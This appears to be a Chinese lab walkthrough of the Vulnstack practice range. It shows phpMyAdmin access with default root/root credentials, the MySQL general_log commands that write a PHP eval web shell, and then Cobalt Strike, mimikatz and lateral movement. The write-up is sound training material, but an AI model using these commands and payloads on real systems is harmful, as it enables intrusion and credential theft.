拓朴图如下:
(win7为VM1(192.168.1.9、192.168.52.2),win2003为VM2(192.168.52.3,win2008为VM3(192.168.52.1))
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
对web服务器进行端口扫描一波
发现存在80和3306端口,访问80端口如下
发现是phpstudy的一个探针,那么就有可能会有phpmyadmin的web管理界面,目录扫描一波
发现确实存在,访问看看
随手一个root/root就进去了,现在就是通过这玩意儿拿shell了
有兴趣的读者可以看看这篇关于phpmyadmin漏洞的总结文章:https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label0_0
这里通过日志文件来进行拿shell
#开启日志记录:
set global general_log = "ON";
#查看当前的日志目录:
show variables like 'general%';
#指定日志文件
set global general_log_file = "指定日志文件的路径";
我们在前面通过phpstudy的探针可以知道网站的路径
设置成功,写入代码
select "<?php eval($_POST['x']); ?>"
用蚁剑连接
我这里直接用蚁剑上线C2马子
这里直接就是管理员权限了
用mimikatz跑一波
查看网卡
看看内网存活有那些主机和端口情况
这里应因为内网机不出网,密码也跑出来,万事具备只欠东风了。
首先在已上线的机器上创建如下监听,监听端口可自定义。利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。
生成payload载荷
这里选择我们刚刚创建的那个listener
将生成的载荷上传到目标机器,并执行
接下来就可以对其他的内网机进行上线了
全部成功上线
因为这是link链接,只要主链路(即出网机Listener)掉线,就都会掉线!
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。